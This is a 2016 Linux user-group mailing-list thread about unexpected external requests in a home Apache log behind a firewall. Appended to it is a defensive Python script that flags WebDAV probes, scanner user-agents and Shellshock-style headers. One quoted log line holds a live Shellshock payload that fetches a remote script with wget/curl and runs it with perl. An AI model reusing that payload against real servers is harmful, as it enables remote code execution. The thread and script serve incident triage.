[lug] Apache requests (to webdav) behind firewall?!

Ralf Mattes rm at seid-online.de
Tue Nov 15 02:13:21 MST 2016


On Tue, Nov 15, 2016 at 01:07:30AM -0700, Lee Woodworth wrote:
> Is the firewall active and configured with the rules you are expecting?

The log really doesn't look like the firewall is working.

> How about a VPN or ssh port forwarding?

Neither vpn nor ssh port forwarding would result in Apache showing
external IPs in the logfile. The same goes for a malicious JavaScript.

 HTH Ralf Mattes

> The log entries look like typical external connections.
> 
> On 11/14/2016 10:00 PM, Bear Giles wrote:
> > I was looking for something else and was shocked to see there are requests
> > in my Apache logs on my home system - behind a firewall that isn't supposed
> > to be doing port forwarding!
> > 
> > 164.132.201.51 - - [13/Nov/2016:08:47:56 -0700] "PROPFIND /webdav/
> > HTTP/1.1" 405 569 "-" "WEBDAV Client"
> > 212.92.127.143 - - [13/Nov/2016:09:10:45 -0700] "GET / HTTP/1.0" 200 3593
> > "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
> > 23.247.72.43 - - [13/Nov/2016:11:35:42 -0700] "GET / HTTP/1.1" 200 3574 "-"
> > "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;
> > .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC
> > 6.0)"
> > 164.132.201.51 - - [13/Nov/2016:12:39:32 -0700] "PROPFIND /webdav/
> > HTTP/1.1" 405 569 "-" "WEBDAV Client"
> > 212.92.127.29 - - [13/Nov/2016:14:21:52 -0700] "GET
> > /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 479 "-" "() { :; }; /bin/bash -c
> > \"wget -O /tmp/.nova.txt 93.158.203.136/style.css; curl -o /tmp/.nova.txt
> > 93.158.203.136/style.css; perl /tmp/.nova.txt; rm -rf /tmp/.nova.txt\""
> > 141.212.122.128 - - [13/Nov/2016:14:26:01 -0700] "GET /x HTTP/1.1" 400 0
> > "-" "Telesphoreo"
> > 192.99.144.140 - - [13/Nov/2016:14:54:49 -0700] "PROPFIND /webdav/
> > HTTP/1.1" 405 569 "-" "WEBDAV Client"
> > 
> > There are obviously probes - but how did they get into the system? Via
> > malicious javascript that's getting past my filters? Something else? The
> > 'wget' entry is particularly disturbing since it clearly recognizes that
> > I'm running Linux.
> > 
> > 
> > 
> > _______________________________________________
> > Web Page:  http://lug.boulder.co.us
> > Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
> > Join us on IRC: irc.hackingsociety.org port=6667 channel=#hackingsociety
> > 
> 
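A defender-side triage of log lines like the ones quoted above, added here as example code that is not part of the thread. It parses Apache combined-format entries, flags the WebDAV PROPFIND probes, the scanner user-agents and the Shellshock-style "() { :; };" header value, and applies the test Ralf uses: whether each source address lies outside the RFC 1918 home-LAN ranges. The sample lines and their RFC 5737 addresses are constructed, not copied from the logs.

```python
import ipaddress
import re

# Apache "combined" log format, the layout of the lines quoted in the thread.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>.*)"$')
# Bash function-definition prefix that marks a Shellshock-style header value.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;\s*\}\s*;')
SCANNER_UAS = ("masscan", "WEBDAV Client", "Telesphoreo")  # UA fragments seen in the thread
# Home LAN ranges (RFC 1918); any other source counts as coming from outside the firewall.
LAN_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample lines (RFC 5737 documentation addresses), modelled on the thread's excerpts.
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Nov/2016:08:47:56 -0700] "PROPFIND /webdav/ HTTP/1.1" 405 569 "-" "WEBDAV Client"',
    '203.0.113.9 - - [13/Nov/2016:09:10:45 -0700] "GET / HTTP/1.0" 200 3593 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"',
    '203.0.113.22 - - [13/Nov/2016:14:21:52 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 479 "-" "() { :; }; /bin/bash -c \\"PLACEHOLDER\\""',
    '192.168.1.20 - - [13/Nov/2016:15:02:11 -0700] "PROPFIND /webdav/ HTTP/1.1" 207 812 "-" "Microsoft-WebDAV-MiniRedir/10.0"',
    '192.0.2.5 - - [13/Nov/2016:11:35:42 -0700] "GET / HTTP/1.1" 200 3574 "-" "Mozilla/5.0"',
]

def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None

def indicator(entry):
    """Name the first indicator that applies to a parsed entry, or None if nothing stands out."""
    if SHELLSHOCK_RE.search(entry["ua"]):
        return "shellshock-style header"
    if entry["method"] == "PROPFIND" or entry["path"].startswith("/webdav"):
        return "webdav probe"
    if any(tag in entry["ua"] for tag in SCANNER_UAS):
        return "known scanner user-agent"
    return None

def is_external(ip):
    """True unless the source is loopback or inside an RFC 1918 range (the thread's 'external IP' test)."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_loopback or any(addr in net for net in LAN_NETS))

def triage(lines):
    """Return (ip, external, indicator) for each flagged line; lines that do not parse are skipped."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and (tag := indicator(entry)):
            hits.append((entry["ip"], is_external(entry["ip"]), tag))
    return hits
```

Any hit with external=True on a host that should have no inbound port forwarding is the condition Bear describes, and is the line to reconcile against the router's NAT and firewall rules.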